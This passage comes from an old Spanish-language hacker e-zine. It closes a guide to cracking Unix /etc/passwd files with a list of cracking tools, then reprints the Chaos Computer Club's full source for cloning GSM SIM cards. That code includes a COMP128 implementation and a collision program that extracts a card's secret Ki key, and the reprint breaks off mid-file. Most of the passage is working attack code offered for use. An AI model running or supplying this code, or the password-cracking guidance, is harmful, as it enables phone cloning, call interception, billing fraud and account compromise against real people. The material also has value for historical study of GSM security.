
  D:\crack>

        Como podemos apreciar solo a encontrado una cuenta, la cual es "wnn",
  aqui vemos una diferencia entre el Guess y el John. Como siempre lo mejor
  es usar un diccionario, pero si fuese el caso que consegueis un fichero
  passwd de un pais extranjero, lo logico es que useis un diccionario en
  ese idioma, ya que asi conseguireis averiguar mas cuentas. Un buen sitio
  para pillar diccionarios es el siguiente url:

  http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html

        Para que luego digan que no aprovechamos los recursos de la NCSA :)
  Y ahora un pongo una lista con los diferentes crackeadores que os podreis
  encontrar en Internet o en nuestra seccion de CRACK.

  Nombre                      Plataforma
  ------                      ----------

  # Crack                     Unix\Dos

  # CrackerJack               Unix\Dos\Os/2

  # PaceCrack95               Windows

  # Qcrack                    Dos\Windows

  # John the Ripper           Unix\Dos\Windows

  # Pcrack                    Unix

  # Hades                     Dos

  # Star Cracker              Dos

  # Killer Cracker            Unix

  # Hellfire Cracker          Dos

  # Xit                       Dos

  # Claymore                  Windows
                           
  # Guess                     Dos

  # PC Unix Password Cracker  Dos

  # Merlin                    Unix
  
        Por si no queda lo suficientemente claro todos estos crackeadores
  solo sirven para los ficheros /etc/passwd de Unix, la plataforma, es en el
  sistema operativo la cual corren estos programas.

        Para conseguir una gran variedad de crackeadores lo mejor es pasar
  por nuestra seccion de CRACK, en la cual podras bajarte muchos, incluido
  el John. En caso que algo no haya quedado claro, pues en envias un mail
  y lo solucionare en el proximo numero :)

  Byes all y hasta la vista !!
    
                                                        CONDE VAMPIRO
                                                  - J.J.F. / HACKERS TEAM -

<>

<>

                       \-------------------------------/
                         \  CLONANDO MOVILES DEL CCC /
                           \-----------------------/

        NOTA DE - J.J.F. / HACKERS TEAM - : Todo este codigo fuente fue
  obtenido en el website del CCC (Chaos Computer Club). Un conocido grupo de
  hackers alemanes. Por lo que no nos hacemos responsables del mal uso del
  material aqui expuesto. Este codigo es para sistemas operativos Linux.

  http://www.ccc.de

  File : getresponse.cc

------------ Codigo Fuente ---------------------------------------------------

#include "getresponse.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

#define private private_hack
extern "C" {
#include <sio.h>
#include <sct0.h>
#include <sc.h>
}
#undef private

int timeout;

SIO_INFO* si;
Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 };
Byte gsm_file[] = { 0x7f, 0x20 };
Byte gsm2_file[] = { 0x7f, 0x21 };
Byte get_res[] = { 0xa0, 0xc0, 0x00,  0x00, 0x00 };
Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 };
Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 };

void init_card(char* devicename, Byte pin[8]) {
  Byte buffer[32];
  int i;
  SC_ATR * atr;
  SC_STATE *sc;
  SLOG *log;

  si = SIO_Open(devicename);
  if (si!=NULL) {
    /* setup for 9600, 8 data, 2 stop, even parity */
    SIO_SetSpeed(si,9600);
    SIO_SetDataBits(si,8);
    SIO_SetStopBits(si,2);
    SIO_SetParity(si,SIO_PARITY_ODD);
    SIO_SetIOMode(si,SIO_IOMODE_INDIRECT);
    SIO_FilterEcho(si, 1);

    /* now actually change the line settings */
    SIO_WriteSettings(si);

    /* trigger ATR from a Smartcard */
    if(i = SCT0_GetATR(si, buffer, 32)) {
      atr=SC_DecodeATR(buffer, i);
      printf("ATR: %s\n", SC_ATR2Text(atr, 0));
      
      SIO_Delay(si,10000);
      SIO_WriteBuffer(si, selectfile, 5);
      SIO_WaitForData(si, 1000);
      SIO_ReadBuffer(si, buffer, 32);

      SIO_WriteBuffer(si, gsm_file, 2);
      SIO_WaitForData(si, 1000);
      SIO_ReadBuffer(si, buffer, 32);

      if(buffer[0] != 0x9f) {
	printf("selecting gsm_file failed, trying DCS1800!\n");

	SIO_WriteBuffer(si, selectfile, 5);
	SIO_WaitForData(si, 1000);
	SIO_ReadBuffer(si, buffer, 32);

	SIO_WriteBuffer(si, gsm2_file, 2);
	SIO_WaitForData(si, 1000);
	SIO_ReadBuffer(si, buffer, 32);

	if(buffer[0] != 0x9f) {
	  printf("selecting gsm_file failed!\n");
	  exit(1);
	}
      }
      get_res[4] = buffer[1];
      memcpy(buffer, get_res, 5);
      SIO_WriteBuffer(si, buffer, 5);
      SIO_WaitForData(si, 1000);
      i = SIO_ReadBuffer(si, buffer, 32);

      SIO_WriteBuffer(si, verify_pin, 5);
      SIO_WaitForData(si, 1000);
      i = SIO_ReadBuffer(si, buffer, 32);

      SIO_WriteBuffer(si, pin, 8);
      SIO_Delay(si,100000);
      SIO_WaitForData(si, 1000);
      i = SIO_ReadBuffer(si, buffer, 32);

      if(buffer[0] != 0x90) {
	printf("PIN verification failed!\n");
	for(int j=0; j<i; j++) {
	  printf("0x%02X ", buffer[j]);
	}
	printf("\n");
	exit(1);
      }

    } else {
      printf("Sorry, connection to your smart card failed.\n");
      exit(1);
    }
  } else {
    printf("Sorry, opening the device %s failed.\n", devicename);
    exit(1);
  }
}

void get_response(Byte challenge[16], Byte response[12]) {
  Byte buffer[32];
  int i;

  memcpy(buffer, generate_sres, 5);
  SIO_WriteBuffer(si, buffer, 5);
  do {
    SIO_WaitForData(si, 1000);
    i = SIO_ReadBuffer(si, buffer, 32);
  } while (i==0);


  memcpy(buffer, challenge, 16);
  SIO_WriteBuffer(si, buffer, 16);
  SIO_Delay(si, timeout);
  do {
    SIO_WaitForData(si, 1000);
    i = SIO_ReadBuffer(si, buffer, 32);
  } while (i==0);

  if(buffer[0] != 0x9f) {
    printf("getting response failed!\n");
    exit(1);
  }

  get_res[4] = buffer[1];
  memcpy(buffer, get_res, 5);
  SIO_WriteBuffer(si, buffer, 5);
  SIO_WaitForData(si, 1000);
  i = SIO_ReadBuffer(si, buffer, 32);

  memcpy(response, buffer + 1, 12);
}

void set_timeout(int t) {
  timeout = t;
}

#ifdef 0
int main(int argc, char** argv) {
  Byte challenge[16] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
			 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  Byte pin[8] = { 0x35, 0x35, 0x35, 0x35, 0xff, 0xff, 0xff, 0xff };

  Byte response[12];

  init_card("/dev/ttyS1", pin);
  get_response(challenge, response);
}
#endif

------------ FIN -------------------------------------------------------------

  File : getresponse.h

------------ Codigo Fuente ---------------------------------------------------

#ifndef _GETRESPONSE_H
#define _GETRESPONSE_H

typedef unsigned char Byte;

extern void init_card(char* devicename, Byte pin[8]);
extern void get_response(Byte challenge[16], Byte response[12]);
extern void set_timeout(int);

#endif

------------ FIN -------------------------------------------------------------

  File : README.GSM

------------ Codigo Fuente ---------------------------------------------------

Hi!

You should have extracted this archive into the same directory as
sio. You can get the latest version of sio at ftp://ftp.cryptsoft/com/scard,
and the latest version of this hack at ftp://www.ccc.de/pub/gsm.

This archive contains a patched sct0.c, which makes this work with
the CCC UniProg and SerProg chipcard interfaces.

Information about this hack is available at http://www.scard.org. This
implementation is by andreas@ccc.de.

Type 'make scan_collision' to build the executable. Type 

'./scan_collision <PIN> <timeout>'

to start scanning. The PIN is the PIN of the card. timeout is the time
the card should wait for the response, the GSM standard specifies that to
be 50ms, give 50000 here.

You have to change the serial device and communication parameters in
the source. Sorry.

Andreas

------------ FIN -------------------------------------------------------------

  File : scan_collision.cc

------------ Codigo Fuente ---------------------------------------------------

#include <map.h>
#include <stdio.h>
#include <ctype.h>
#include "getresponse.h"

#undef TEST

typedef unsigned char Byte;


struct ltsim {
  bool operator()(const Byte* b1, const Byte* b2) const {
    return memcmp(b1, b2, 12) < 0;
  }
};

typedef map<const Byte*, const Byte*, ltsim> simoutput_map;

/* An implementation of the GSM A3A8 algorithm.  (Specifically, COMP128.) 
 */

/* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner.
 * All rights reserved.
 */

/*
 * For expository purposes only.  Coded in C merely because C is a much
 * more precise, concise form of expression for these purposes.  See Judge
 * Patel if you have any problems with this...
 * Of course, it's only authentication, so it should be exportable for the
 * usual boring reasons.
 */

/* The compression tables. */
static const Byte table_0[512] = {
        102,177,186,162,  2,156,112, 75, 55, 25,  8, 12,251,193,246,188,
        109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161,
        252, 37,244, 47, 64,211,  6,237,185,160,139,113, 76,138, 59, 70,
         67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116,
        247,194, 41, 84, 71,  1, 49, 14, 95, 35,169, 21, 96, 78,215,225,
        182,243, 28, 92,201,118,  4, 74,248,128, 17, 11,146,132,245, 48,
        149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176,
        250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121,
         61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196,
         56,197,158,  0,100, 45,153,  7,144,222,163,167, 60,135,210,231,
        174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255,
        239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82,
        104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198,  5,
         57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226,
        184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23,
         80,159,134,111,  9,114,  3, 91, 16,130, 83, 10,195,240,253,119,
        177,102,162,186,156,  2, 75,112, 25, 55, 12,  8,193,251,188,246,
        213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108,
         37,252, 47,244,211, 64,237,  6,160,185,113,139,138, 76, 70, 59,
         26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207,
        194,247, 84, 41,  1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215,
        243,182, 92, 28,118,201, 74,  4,128,248, 11, 17,132,146, 48,245,
         90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137,
         27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32,
        103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172,
        197, 56,  0,158, 45,100,  7,153,222,144,167,163,135, 60,231,210,
        165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125,
         54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192,
        170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46,  5,198,
        254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147,
        218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154,
        159, 80,111,134,114,  9, 91,  3,130, 16, 10, 83,240,195,119,253
    }, table_1[256] = {
         19, 11, 80,114, 43,  1, 69, 94, 39, 18,127,117, 97,  3, 85, 43,
         27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79,  4, 14, 59, 11,  5,
         35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120,  6,
         53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20,
         90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101,  8, 19, 78,
         76, 66,104, 46,111, 50, 32,  3, 39,  0, 58, 25, 92, 22, 18, 51,
         57, 65,119,116, 22,109,  7, 86, 59, 93, 62,110, 78, 99, 77, 67,
         12,113, 87, 98,102,  5, 88, 33, 38, 56, 23,  8, 75, 45, 13, 75,
         95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106,  2,103, 29,
         82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40,  7,114,
         82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97,  9, 54, 55, 74,
        113,123, 17, 26, 53, 58,  4,  9, 69,122, 21,118, 42, 60, 27, 73,
        118,125, 34, 15, 65,115, 84, 64, 62, 81, 70,  1, 24,111,121, 83,
        104, 81, 49,127, 48,105, 31, 10,  6, 91, 87, 37, 16, 54,116,126,
         31, 38, 13,  0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52,
        101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90,  2,119,122, 35
    }, table_2[128] = {
         52, 50, 44,  6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43,
         37,  4, 40, 34, 61, 12, 28,  4, 58, 23,  8, 15, 12, 22,  9, 18,
         55, 10, 33, 35, 50,  1, 43,  3, 57, 13, 62, 14,  7, 42, 44, 59,
         62, 57, 27,  6,  8, 31, 26, 54, 41, 22, 45, 20, 39,  3, 16, 56,
         48,  2, 21, 28, 36, 42, 60, 33, 34, 18,  0, 11, 24, 10, 17, 61,
         29, 14, 45, 26, 55, 46, 11, 17, 54, 46,  9, 24, 30, 60, 32,  0,
         20, 38,  2, 30, 58, 35,  1, 16, 56, 40, 23, 48, 13, 19, 19, 27,
         31, 53, 47, 38, 63, 15, 49,  5, 37, 53, 25, 36, 63, 29,  5,  7
    }, table_3[64] = {
          1,  5, 29,  6, 25,  1, 18, 23, 17, 19,  0,  9, 24, 25,  6, 31,
         28, 20, 24, 30,  4, 27,  3, 13, 15, 16, 14, 18,  4,  3,  8,  9,
         20,  0, 12, 26, 21,  8, 28,  2, 29,  2, 15,  7, 11, 22, 14, 10,
         17, 21, 12, 30, 26, 27, 16, 31, 11,  7, 13, 23, 10,  5, 22, 19
    }, table_4[32] = {
         15, 12, 10,  4,  1, 14, 11,  7,  5,  0, 14,  7,  1,  2, 13,  8,
         10,  3,  4,  9,  6,  0,  3,  2,  5,  6,  8,  9, 11, 13, 15, 12
    }, *table[5] = { table_0, table_1, table_2, table_3, table_4 };

/*
 * rand[0..15]: the challenge from the base station
 * key[0..15]: the SIM's A3/A8 long-term key Ki
 * simoutput[0..11]: what you'd get back if you fed rand and key to a real
 * SIM.
 *
 *   The GSM spec states that simoutput[0..3] is SRES,
 *   and simoutput[4..11] is Kc (the A5 session key).
 *   (See GSM 11.11, Section 8.16.  See also the leaked document
 *   referenced below.)
 *   Note that Kc is bits 74..127 of the COMP128 output, followed by 10
 *   zeros.
 *   In other words, A5 is keyed with only 54 bits of entropy. This
 *   represents a deliberate weakening of the key used for voice privacy
 *   by a factor of over 1000.
 * 
 * Verified with a Pacific Bell Schlumberger SIM.  Your mileage may vary.
 *
 * Marc Briceno <marc@scard.org>, Ian Goldberg <iang@cs.berkeley.edu>,
 * and David Wagner <daw@cs.berkeley.edu>
 *//*
 * This code derived from a leaked document from the GSM standards.
 * Some missing pieces were filled in by reverse-engineering a working SIM.
 * We have verified that this is the correct COMP128 algorithm.
 * 
 * The first page of the document identifies it as
 *      _Technical Information: GSM System Security Study_.
 *      10-1617-01, 10th June 1988.
 * The bottom of the title page is marked
 *      Racal Research Ltd.
 *      Worton Drive, Worton Grange Industrial Estate,
 *      Reading, Berks. RG2 0SB, England.
 *      Telephone: Reading (0734) 868601   Telex: 847152
 * The relevant bits are in Part I, Section 20 (pages 66--67).  Enjoy!
 * 
 * Note: There are three typos in the spec (discovered by
 * reverse-engineering).
 * First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read
 * "z = (2 * x[m] + x[n]) mod 2^(9-j)".
 * Second, the "k" loop in the "Form bits from bytes" section is severely
 * botched: the k index should run only from 0 to 3, and clearly the range
 * on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8,
 * to be consistent with the subsequent section).
 * Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as
 * claimed in the document.  (And the document doesn't specify how Kc is
 * derived, but that was also easily discovered with reverse engineering.)
 * All of these typos have been corrected in the following code.
 */

void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
	/* out */ Byte simoutput[12])
{
	Byte x[32], bit[128];
	int i, j, k, l, m, n, y, z, next_bit;

	/* ( Load RAND into last 16 bytes of input ) */
	for (i=16; i<32; i++)
		x[i] = rand[i-16];

	/* ( Loop eight times ) */
	for (i=1; i<9; i++) {
		/* ( Load key into first 16 bytes of input ) */
		for (j=0; j<16; j++)
			x[j] = key[j];
		/* ( Perform substitutions ) */
		for (j=0; j<5; j++)
			for (k=0; k<(1<<j); k++)
				for (l=0; l<(1<<(4-j)); l++) {
					m = l + k*(1<<(5-j));
					n = m + (1<<(4-j));
					y = (x[m]+2*x[n]) % (1<<(9-j));
					z = (2*x[m]+x[n]) % (1<<(9-j));
					x[m] = table[j][y];
					x[n] = table[j][z];
				}
		/* ( Form bits from bytes ) */
		for (j=0; j<32; j++)
			for (k=0; k<4; k++)
				bit[4*j+k] = (x[j]>>(3-k)) & 1;
		/* ( Permutation but not on the last loop ) */
		if (i < 8)
			for (j=0; j<16; j++) {
				x[j+16] = 0;
				for (k=0; k<8; k++) {
					next_bit = ((8*j + k)*17) % 128;
					x[j+16] |= bit[next_bit] << (7-k);
				}
			}
	}

	/*
	 * ( At this stage the vector x[] consists of 32 nibbles.
	 *   The first 8 of these are taken as the output SRES. )
	 */

	/* The remainder of the code is not given explicitly in the
	 * standard, but was derived by reverse-engineering.
	 */

	for (i=0; i<4; i++)
		simoutput[i] = (x[2*i]<<4) | x[2*i+1];
	for (i=0; i<6; i++)
		simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2)
				| (x[2*i+18+2]>>2);
	simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2);
	simoutput[4+7] = 0;
}

int hextoint(char x)
{
  x = toupper(x);
  if (x >= 'A' && x <= 'F')
    return x-'A'+10;
  else if (x >= '0' && x <= '9')
    return x-'0';
  fprintf(stderr, "bad input.\n");
  exit(1);
  return 0;
}

int main(int argc, char **argv)
{
  Byte pin[8] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
  Byte key[16], simoutput[12];
  int i,j,k,l;
  simoutput_map* simmap;
  Byte* collision_map[8][2];

#ifdef TEST
  if (argc != 2 || strlen(argv[1]) != 34
      || strncmp(argv[1], "0x", 2) != 0) {
    fprintf(stderr, "Usage: %s 0x<key>\n", argv[0]);
    exit(1);
  }

  for (i=0; i<16; i++)
    key[i] = (hextoint(argv[1][2*i+2])<<4)
      | hextoint(argv[1][2*i+3]);
#else
  if (argc != 3) {
    fprintf(stderr, "Usage: %s <PIN> <timeout>\n", argv[0]);
    exit(1);
  }

  for (i=0; i<strlen(argv[1]) && i<8; i++) {
    pin[i] = argv[1][i];
  }
  
  set_timeout(atoi(argv[2]));

#endif

  init_card("/dev/ttyS1", pin);

  for(i=0; i < 8; i++) {
    simmap = new simoutput_map;
    collision_map[i][0] = NULL;
    collision_map[i][1] = NULL;
    for(j=0; j<256; j++) {
      fprintf(stderr, ".");
      for(k=0; k<256; k++) {
      	Byte* newrand = new Byte[16];
	memset(newrand, 0, 16); 
	newrand[i+8] = k;
	newrand[i] = j;

	Byte* newoutput = new Byte[12];

#ifdef TEST
	A3A8(newrand, key, newoutput);
#else
	get_response(newrand, newoutput);
#endif
	if(simmap->count(newoutput)) {
	  printf("\nCollision for i=%i: ", i);
	  for (l=0; l<16; l++)
	    printf("%02X", newrand[l]);
	  printf(" ");
	  for (l=0; l<16; l++)
	    printf("%02X", (*simmap)[newoutput][l]);
	  j=256; k=256;
	  collision_map[i][0] = new Byte[16];
	  collision_map[i][1] = new Byte[16];
	  memcpy(collision_map[i][0], newrand, 16);
	  memcpy(collision_map[i][1], (*simmap)[newoutput], 16);

	} else {
#ifdef VERBOSE
	  for (l=0; l<16; l++)
	    printf("%02X", newrand[l]);
	  printf(" ");
	  for (l=0; l<12; l++)
	    printf("%02X", newoutput[l]);
	  printf("\n");
#endif
	  (*simmap)[newoutput]=newrand;
	}
	fflush(stdout);
      }
    }
    printf("\n");
    for(simoutput_map::iterator I=simmap->begin(); I!=simmap->end(); I++) {
      delete (*I).first;
      delete (*I).second;
      //      simmap.erase(I);
    }
    delete simmap;
  }

  Byte newkey[16];
  Byte resultkey[16];
  Byte res1[16], res2[16];

  memset(resultkey, 0, 16);

  for(i=0; i<8; i++) {
    memset(newkey, 0, 16);
    for(j=0; j<256; j++) {
      newkey[i]=j;
      fprintf(stderr, ".");
      for(k=0; k<256; k++) {
	newkey[i+8]=k;
	A3A8(collision_map[i][0], newkey, res1);
	A3A8(collision_map[i][1], newkey, res2);
	if(!memcmp(res1, res2, 12)) {
	  resultkey[i]=j;
	  resultkey[i+8]=k;
	  printf("\nKey bytes found, Ki so far: ");
	  for (l=0; l<16; l++)
	    printf("%02X", resultkey[l]);
	  j = 256; k = 256;
	}
      }
    }
    printf("\n");
  }
  printf("\nAnd the Ki is: ");
  for (l=0; l<16; l++)
    printf("%02X", resultkey[l]);
  printf("\n");

  return 0;
}

------------ FIN -------------------------------------------------------------

  File : SCT0.C

------------ Codigo Fuente ---------------------------------------------------

/* sct0.c	- Smartcard T=0 related functions
 *
 * Copyright 1993-1997, Tim Hudson. All rights reserved.
 *
 * You can pretty much do what you like with this code except pretend that 
 * you wrote it provided that any derivative of this code includes the
 * above comments unchanged. If you put this in a product then attribution
 * is mandatory. See the details in the COPYING file.
 *
 * Tim Hudson
 * tjh@cryptsoft.com
 *
 */

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#include "sio.h"
#include "sct0.h"

static int dbglev=0;
static SLOG *outf=NULL;

/* max number of times we retry a probe when we don't get back
 * something that is a valid response 
 */
#define MAX_RETRIES  2

int SCT0_SetDebug(int lev)
{
  int oldlev;

  oldlev=dbglev;
  dbglev=lev;
  return(oldlev);
}

int SCT0_GetDebug(void)
{
  return(dbglev);
}

int SCT0_SetDebugLog(SLOG *slog)
{
  if (outf!=NULL)
    SLOG_close(outf);
  outf=slog;
  return(1);
}

int SCT0_Reset(SIO_INFO *s)
{
  int ch;

  /* flush any data in the buffer - this is important */
  while ((ch=SIO_ReadChar(s))!=-1)
    ;

  /* toggle RTS to trigger reset */
#if 0
  SIO_DropRTS(s);
  SIO_Delay(s,25);
  SIO_RaiseRTS(s);
  SIO_Delay(s,25);
#endif
#if 1
  SIO_RaiseRTS(s);
  SIO_Delay(s,25);
  SIO_DropRTS(s);
  SIO_Delay(s,25);
#endif

  return(1);
}

int SCT0_GetATR(SIO_INFO *s,char *buf,int bufsize)
{
  int i,n,ch;

  SCT0_Reset(s);

  /* now read in whatever data is available */
  n=0;
  /* we have two shots at doing this ... some cards are a little 
   * slow at responding 
   */
  for(i=0;i<2;i++) {
    while ((ch=SIO_ReadChar(s))!=-1) {
      if (buf!=NULL) {
	if (n>=bufsize)
	  break;
	buf[n++]=(ch & 0xff);
      }
    }
  }
  return(n);
}

/* we maintain a table of settings that it makes sense to scan through
 * when looking for the communication settings for use with a particular
 * smartcard ... the order here is setup to match the most likely things
 * first so you probably shouldn't play with it.
 */
static long all_speed[]={9600L,19200L,38400L,115200L};
static int all_parity[]={SIO_PARITY_EVEN,SIO_PARITY_ODD,SIO_PARITY_NONE};
static int all_databits[]={8,7};
static int all_stopbits[]={2,1};
static int all_iomode[]={SIO_IOMODE_DIRECT,SIO_IOMODE_INDIRECT};

#define N_all_speed (sizeof(all_speed)/sizeof(all_speed[0]))
#define N_all_parity (sizeof(all_parity)/sizeof(all_parity[0]))
#define N_all_databits (sizeof(all_databits)/sizeof(all_databits[0]))
#define N_all_stopbits (sizeof(all_stopbits)/sizeof(all_stopbits[0]))
#define N_all_iomode (sizeof(all_iomode)/sizeof(all_iomode[0]))

int SCT0_ScanForATR(SIO_INFO *s,char *ubuf,int ubufsiz)
{
  long aspeed;
  int aparity,adatabits,astopbits,aiomode;
  char buf[256];
  int len;

  for(aspeed=0;aspeed<N_all_speed;aspeed++)
    for(adatabits=0;adatabits<N_all_databits;adatabits++)
      for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
        for(aparity=0;aparity<N_all_parity;aparity++)
          for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
	    SIO_SetSpeed(s,all_speed[aspeed]);
	    SIO_SetDataBits(s,all_databits[adatabits]);
	    SIO_SetStopBits(s,all_stopbits[astopbits]);
	    SIO_SetParity(s,all_parity[aparity]);
	    SIO_SetIOMode(s,all_iomode[aiomode]);
	    SIO_WriteSettings(s);
	    len=SCT0_GetATR(s,buf,sizeof(buf));

	    if (dbglev)
	      SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
	    if (len>0) {
	      if (dbglev) {
		/* dump the record */
		SLOG_printf(outf,"ATR-DATA: ");
		SLOG_dump(outf,buf,len,0);
		SLOG_printf(outf,"\n");
		SLOG_printf(outf,"ATR-TEXT: ");
		SLOG_dump(outf,buf,len,1);
		SLOG_printf(outf,"\n");
	      }
	      /* it has to be a valid ATR response before we
	       * consider that it has worked 
	       */
	      if ((buf[0]==0x3f)||(buf[0]==0x3b)) {
		/* copy into the users buffer */
	        if ((ubuf!=NULL)&&(len<=ubufsiz))
		  memcpy(ubuf,buf,len);
		return(len);
	      }
	    }
	  }
  return(0);
}

int SCT0_ScanClasses(SIO_INFO *s,char *classlist)
{
  int i,j,len;
  unsigned char buf[BUFSIZ];
  int retries,reset_done;

  /* flush data ... read until nothing available */
  while (SIO_ReadChar(s)!=-1)
    ;

  reset_done=retries=0;
  for(i=0;i<=255;i++) {
do_again: ;
    buf[0]=i;	/* CLA = 0 */
    buf[1]=0x0;
    buf[2]=0x0;
    buf[3]=0x0;
    buf[4]=0x0;
    len=SIO_WriteBuffer(s,buf,5);

    /* we need to delay before reading to give the reader time
     * to start responding
     */
    SIO_Delay(s,100);

    /* now read in some data */
    for(j=0;j<2;j++) {
      len=SIO_ReadBuffer(s,buf,sizeof(buf));
      if (len>0)
	break;
    }

    if (dbglev) {
      SLOG_printf(outf,"CLA 0x%02x: (%d) ",i,len);
      SLOG_dump(outf,buf,len,0);
      SLOG_printf(outf,"\n");
    }

    if (len!=2) {
      if (retries++>MAX_RETRIES) {
	if (!reset_done) {
	  /* reset things ... some cards defend against 
	   * a probe like this
	   */
	  SCT0_Reset(s);
	  while (SIO_ReadChar(s)!=-1)
	    ;
	  reset_done++;

	  if (dbglev) {
	    SLOG_printf(outf,"CLA 0x%02x: SKIPPING with RESET\n",i);
	  }

	  /* skip to next INS */
	  continue;
	}
	return (-1);
      }
      goto do_again;
    }

    /* process the result ... 6e 00 means the class doesn't exist */
    if (buf[0]!=0x6e)
      classlist[i]=1;
    else
      classlist[i]=0;

    reset_done=0;

  }
  return(1);
}

int SCT0_ScanInstructions(SIO_INFO *s,char theclass,char *inslist)
{
  int i,j,len;
  unsigned char buf[BUFSIZ];
  int retries;

  if (dbglev)
    SLOG_printf(outf,"INS scan for CLASS 0x%02x\n",theclass & 0xff);

  /* flush data ... read until nothing available */
  while (SIO_ReadChar(s)!=-1)
    ;

  retries=0;

  for(i=0;i<=255;i++) {
do_again: ;
    buf[0]=theclass;	/* CLA = 0 */
    buf[1]=i;           /* instruction */
    buf[2]=0x0;
    buf[3]=0x0;
    buf[4]=0x0;
    len=SIO_WriteBuffer(s,buf,5);

    /* we need to delay before reading to give the reader time
     * to start responding
     */
    SIO_Delay(s,100);

    /* now read in some data */
    for(j=0;j<2;j++) {
      len=SIO_ReadBuffer(s,buf,sizeof(buf));
      if (len>0)
	break;
    }

    if (dbglev) {
      SLOG_printf(outf,"INS 0x%02x: (%d) ",i,len);
      SLOG_dump(outf,buf,len,0);
      SLOG_printf(outf,"\n");
    }

    /* we could get back a response to a command that didn't
     * need any parameters ... which we should handle
     */
    if (len==3) {
      if ((buf[0] & 0xff)==i) {
	/* process the result ... 6e 00 or 6d 00 means the instruction
	 * doesn't exist ... 6d=unknown, 6e=wrong
	 */
	if ((buf[1]!=0x6e)&&(buf[1]!=0x6d))
	  inslist[i]=1;
	else
	  inslist[i]=0;
	continue;
      } else {
	/*
	SLOG_printf(outf,"len=3 i=0x%x buf[0]=0x%x\n",i,buf[0]);
	*/
      }
    }

    if (len!=2) {
      if (retries++>MAX_RETRIES)
	return (-1);
      goto do_again;
    }

    /* process the result ... 6e 00 or 6d 00 means the instruction
     * doesn't exist ... 6d=unknown, 6e=wrong
     */
    if ((buf[0]!=0x6e)&&(buf[0]!=0x6d))
      inslist[i]=1;
    else
      inslist[i]=0;

  }
  return(1);
}

int SCT0_ScanFiles(SIO_INFO *s,char theclass,char thefile,char *filelist)
{
  int i,j,len;
  unsigned char buf[BUFSIZ];
  int retries;

  if (dbglev)
    SLOG_printf(outf,"FILE scan for CLASS 0x%02x file 0x%02x\n",
	            theclass & 0xff, thefile & 0xff);

  /* flush data ... read until nothing available */
  while (SIO_ReadChar(s)!=-1)
    ;

  retries=0;

  for(i=0;i<=255;i++) {
do_again: ;
    buf[0]=theclass;	/* CLA = 0 */
    buf[1]=0xa4;        /* instruction */
    buf[2]=0x0;
    buf[3]=0x0;
    buf[4]=0x2;
    len=SIO_WriteBuffer(s,buf,5);

    /* we need to delay before reading to give the reader time
     * to start responding
     */
    SIO_Delay(s,100);

    /* now read in some data - which should be the INS */
    for(j=0;j<2;j++) {
      len=SIO_ReadBuffer(s,buf,sizeof(buf));
      if (len>0)
	break;
    }

    if (dbglev) {
      SLOG_printf(outf,"FILE 0x%02x: (%d) [INS] ",i,len);
      SLOG_dump(outf,buf,len,0);
      SLOG_printf(outf,"\n");
    }

    if (len!=1) {
      if (retries++>MAX_RETRIES)
	return (-1);
      goto do_again;
    }

    /* we must get the INS back or things are broken! */
    if (buf[0]!=0xa4) {
      if (dbglev)
	SLOG_printf(outf,"ScanFiles - didn't get back INS - aborting scan\n");
      return (-1);
    }

    /* now send the file ID */
    buf[0]=thefile;    
    buf[1]=i;
    len=SIO_WriteBuffer(s,buf,2);

    /* we need to delay before reading to give the reader time
     * to start responding
     */
    SIO_Delay(s,100);

    /* now read in some data - which should be the response code */
    for(j=0;j<2;j++) {
